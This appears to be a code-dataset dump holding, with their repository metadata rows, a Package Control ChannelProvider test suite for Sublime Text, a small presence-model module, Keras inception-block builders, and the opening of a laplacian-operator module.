"version": "1.0.1-beta",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json"
)
)
self.assertEqual(
{
"package_control-tester-1.2": {
"name": "package_control-tester-1.2",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
)
)
def test_get_name_map_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_name_map()
)
def test_get_renamed_packages_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_renamed_packages()
)
def test_get_repositories_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.2.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-github_details.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-bitbucket_details.json"
],
provider.get_repositories()
)
def test_get_sources_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.2.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-github_details.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-bitbucket_details.json"
],
provider.get_sources()
)
def test_get_packages_20(self):
self.maxDiff = None
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
{
"package_control-tester-1.0": {
"name": "package_control-tester-1.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2011-08-01 00:00:00",
"releases": [
{
"version": "1.0.1",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json"
)
)
self.assertEqual(
{
"package_control-tester-1.2": {
"name": "package_control-tester-1.2",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
)
)
self.assertEqual(
{
"package_control-tester-2.0": {
"name": "package_control-tester-2.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-explicit.json"
)
)
self.assertEqual(
{
"package_control-tester-2.0-gh": {
"name": "package_control-tester-2.0-gh",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-github_details.json"
)
)
self.assertEqual(
{
"package_control-tester-2.0-bb": {
"name": "package_control-tester-2.0-bb",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-bitbucket_details.json"
)
)

    def test_get_name_map_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_name_map()
)

    def test_get_renamed_packages_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_renamed_packages()
)

    def test_get_repositories_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-github_releases.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-bitbucket_releases.json"
],
provider.get_repositories()
)

    def test_get_sources_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-github_releases.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-bitbucket_releases.json"
],
provider.get_sources()
)

    def test_get_packages_300(self):
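        # The 3.0.0 channel aggregates three repositories; packages are
        # asserted per repository URL below (explicit, github_releases and
        # bitbucket_releases).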
self.maxDiff = None
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{
"package_control-tester-3.0.0": {
"name": "package_control-tester-3.0.0",
"author": ["packagecontrol", "wbond"],
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": "https://gratipay.com/wbond/",
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"],
"dependencies": ["bz2"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json"
)
)
self.assertEqual(
{
"package_control-tester-3.0.0-gh-tags": {
"name": "package_control-tester-3.0.0-gh-tags",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
},
"package_control-tester-3.0.0-gh-tags_base": {
"name": "package_control-tester-3.0.0-gh-tags_base",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
},
"package_control-tester-3.0.0-gh-tags_prefix": {
"name": "package_control-tester-3.0.0-gh-tags_prefix",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/win-1.0.2",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
},
"package_control-tester-3.0.0-gh-branch": {
"name": "package_control-tester-3.0.0-gh-branch",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "2014.11.28.20.54.15",
"date": "2014-11-28 20:54:15",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/master",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-github_releases.json"
)
)
self.assertEqual(
{
"package_control-tester-3.0.0-bb-tags": {
"name": "package_control-tester-3.0.0-bb-tags",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester"
"/get/1.0.1.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
},
"package_control-tester-3.0.0-bb-tags_prefix": {
"name": "package_control-tester-3.0.0-bb-tags_prefix",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://bitbucket.org/wbond/package_control-tester/get/win-1.0.2.zip",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
},
"package_control-tester-3.0.0-bb-branch": {
"name": "package_control-tester-3.0.0-bb-branch",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "2014.11.28.20.54.15",
"date": "2014-11-28 20:54:15",
"url": "https://bitbucket.org/wbond/package_control-tester/get/master.zip",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-bitbucket_releases.json"
)
)

    def test_get_dependencies_300(self):
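        # The dependencies (bz2, ssl-linux, ssl-windows) come from the
        # explicit repository of the 3.0.0 channel.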
self.maxDiff = None
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{
'bz2': {
"name": "bz2",
"load_order": "02",
"author": "wbond",
"description": "Python bz2 module",
"issues": "https://github.com/wbond/package_control/issues",
"releases": [
{
"version": "1.0.0",
"url": "https://packagecontrol.io/bz2.sublime-package",
"sublime_text": "*",
"platforms": ["*"]
}
]
},
'ssl-linux': {
"name": "ssl-linux",
"load_order": "01",
"description": "Python _ssl module for Linux",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-linux.sublime-package",
"sublime_text": "*",
"platforms": ["linux"],
"sha256": "d12a2ca2843b3c06a834652e9827a29f88872bb31bd64230775f3dbe12e0ebd4"
}
]
},
'ssl-windows': {
"name": "ssl-windows",
"load_order": "01",
"description": "Python _ssl module for Sublime Text 2 on Windows",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-windows.sublime-package",
"sublime_text": "<3000",
"platforms": ["windows"],
"sha256": "efe25e3bdf2e8f791d86327978aabe093c9597a6ceb8c2fb5438c1d810e02bea"
}
]
}
},
provider.get_dependencies(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json"
)
)
| 46.682432 | 117 | 0.427809 | 8,079 | 103,635 | 5.371209 | 0.0203 | 0.123888 | 0.124441 | 0.090335 | 0.980965 | 0.978684 | 0.977024 | 0.967484 | 0.959004 | 0.956791 | 0 | 0.051405 | 0.449819 | 103,635 | 2,219 | 118 | 46.70347 | 0.709653 | 0 | 0 | 0.729489 | 0 | 0.025785 | 0.377373 | 0.065084 | 0 | 0 | 0 | 0 | 0.037506 | 1 | 0.032818 | false | 0 | 0.004688 | 0.003282 | 0.047351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
58b9a7646cac2b5b9ab710cca6b48b5c05877af5 | 729 | py | Python | bunny/api/models/presence.py | senpai-development/SenpaiSlasher | 89842e584b4cd60731ce9c43315c08b02a8dc8e3 | ["MIT"] | null | null | null | bunny/api/models/presence.py | senpai-development/SenpaiSlasher | 89842e584b4cd60731ce9c43315c08b02a8dc8e3 | ["MIT"] | null | null | null | bunny/api/models/presence.py | senpai-development/SenpaiSlasher | 89842e584b4cd60731ce9c43315c08b02a8dc8e3 | ["MIT"] | 1 | 2021-10-31T02:40:03.000Z | 2021-10-31T02:40:03.000Z | from .misc import DictSerializerMixin
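
# Each model below is a thin wrapper over DictSerializerMixin: every field is
# taken verbatim from the keyword arguments forwarded to the mixin.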
class _PresenceParty(DictSerializerMixin):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class _PresenceAssets(DictSerializerMixin):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class _PresenceSecrets(DictSerializerMixin):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class _PresenceButtons(DictSerializerMixin):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class PresenceActivity(DictSerializerMixin):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)


class PresenceUpdate(DictSerializerMixin):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
| 22.78125 | 44 | 0.696845 | 64 | 729 | 7.125 | 0.25 | 0.289474 | 0.342105 | 0.394737 | 0.725877 | 0.725877 | 0.725877 | 0.725877 | 0.614035 | 0 | 0 | 0 | 0.170096 | 729 | 31 | 45 | 23.516129 | 0.753719 | 0 | 0 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.315789 | false | 0 | 0.052632 | 0 | 0.684211 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
4524eb40ba5544fe387dc9e8e60cbd80ac551bb9 | 3,133 | py | Python | LOBDeepPP/LOBDeepPP_model/__inception.py | mariussterling/LOBDeepPP_code | 010782f8db9a745940753f49d953361c32ee1190 | ["MIT"] | 1 | 2021-07-09T08:40:58.000Z | 2021-07-09T08:40:58.000Z | LOBDeepPP/LOBDeepPP_model/__inception.py | mariussterling/LOBDeepPP_code | 010782f8db9a745940753f49d953361c32ee1190 | ["MIT"] | null | null | null | LOBDeepPP/LOBDeepPP_model/__inception.py | mariussterling/LOBDeepPP_code | 010782f8db9a745940753f49d953361c32ee1190 | ["MIT"] | null | null | null | from keras import layers
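
# Both builders below assemble an Inception-style block: a 1x1->3x3 branch, a
# 1x1->5x5 branch, a maxpool->1x1 branch and a 1x1 "skip" branch, each with
# `filters` channels, concatenated along the channel axis (so the output
# carries 4 * filters channels).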
def inception(inp, filters, name, bias_constraint=None):
out1 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv3_1')(inp)
out1 = layers.Conv1D(
filters=filters,
kernel_size=3,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv3')(out1)
out2 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv5_1')(inp)
out2 = layers.Conv1D(
filters=filters,
kernel_size=5,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv5')(out2)
out3 = layers.MaxPool1D(
pool_size=3,
strides=1,
padding='same',
name=name + '_mxpool3')(inp)
out3 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_mxpool3_1')(out3)
out4 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_skip')(inp)
out = layers.Concatenate(axis=2, name=name + '_concatenate')([
out1, out2, out3, out4])
return out


def inception2D(inp, filters, name, bias_constraint=None):
out1 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv3_1')(inp)
out1 = layers.Conv2D(
filters=filters,
kernel_size=3,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv3')(out1)
out2 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv5_1')(inp)
out2 = layers.Conv2D(
filters=filters,
kernel_size=5,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv5')(out2)
out3 = layers.MaxPool2D(
pool_size=3,
strides=1,
padding='same',
name=name + '_mxpool3')(inp)
out3 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_mxpool3_1')(out3)
out4 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_skip')(inp)
out = layers.Concatenate(axis=3, name=name + '_concatenate')([
out1, out2, out3, out4])
return out
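
# A minimal usage sketch (the input shape below is illustrative and not part
# of this module):
#
#     inp = layers.Input(shape=(100, 40))          # (steps, channels)
#     x = inception(inp, filters=16, name='blk1')  # -> (100, 4 * 16) channels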
| 29.009259 | 66 | 0.57421 | 328 | 3,133 | 5.295732 | 0.125 | 0.209557 | 0.138169 | 0.165803 | 0.961428 | 0.961428 | 0.961428 | 0.92228 | 0.830167 | 0.743811 | 0 | 0.035991 | 0.299394 | 3,133 | 107 | 67 | 29.280374 | 0.755353 | 0.015002 | 0 | 0.893204 | 0 | 0 | 0.0747 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019417 | false | 0 | 0.009709 | 0 | 0.048544 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
189cc7e5f72d8b247ae12c94308e5401c32d7b8c | 67,747 | py | Python | mrpy/spatial_operators/ctr_poly/2nd_order_ctr_finite_diff/laplacian-bis.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | ["BSD-3-Clause"] | 2 | 2020-01-06T10:48:44.000Z | 2020-01-09T20:07:08.000Z | mrpy/spatial_operators/ctr_poly/2nd_order_ctr_finite_diff/laplacian-bis.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | ["BSD-3-Clause"] | 1 | 2020-01-09T20:08:50.000Z | 2020-01-09T20:11:20.000Z | mrpy/spatial_operators/ctr_poly/2nd_order_ctr_finite_diff/laplacian-bis.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | ["BSD-3-Clause"] | null | null | null | from __future__ import print_function, division
#!!!!!!!!!!! DEPRECATED. SHOULD BE SUPPRESSED !!!!!!!!!!!!!
"""This module is used to compute the laplacian operator.

The procedure "create_matrix" returns the matrix representing the discrete
form of this operator on a cartesian grid representation of a variable.
Since the spatial operator depends on the specific boundary conditions applied
to the computed variable, this matrix depends on those boundary conditions.

The procedure "create_bc_scalar" returns an array of the values needed to
